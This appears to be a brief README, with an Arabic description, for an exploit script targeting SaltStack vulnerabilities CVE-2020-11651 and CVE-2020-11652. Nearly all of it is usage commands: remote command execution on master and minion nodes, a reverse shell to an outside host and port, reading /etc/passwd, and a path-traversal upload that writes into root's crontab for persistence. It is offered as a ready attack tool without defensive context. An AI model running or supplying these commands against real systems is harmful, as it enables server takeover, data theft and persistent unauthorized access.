
استغلال لثغرات SaltStack (CVE-2020-11651/11652) يتيح تنفيذ أوامر عن بُعد على الخادم الرئيسي/العقد التابعة، وقراءة/رفع الملفات، وإنشاء قشرة عكسية.
CVE-2020-11651 CVE-2020-11652
python exp.py --exec-choose master --exec-cmd "whoami"
python exp.py --exec-choose minions --exec-cmd "whoami"
python exp.py --shell-LHOST 8.8.8.8 --shell-LPORT 4444
python exp.py --read /etc/passwd
python exp.py --upload-src "/test/root" --upload-dest "../../../../../../../../var/spool/cron/crontabs/root"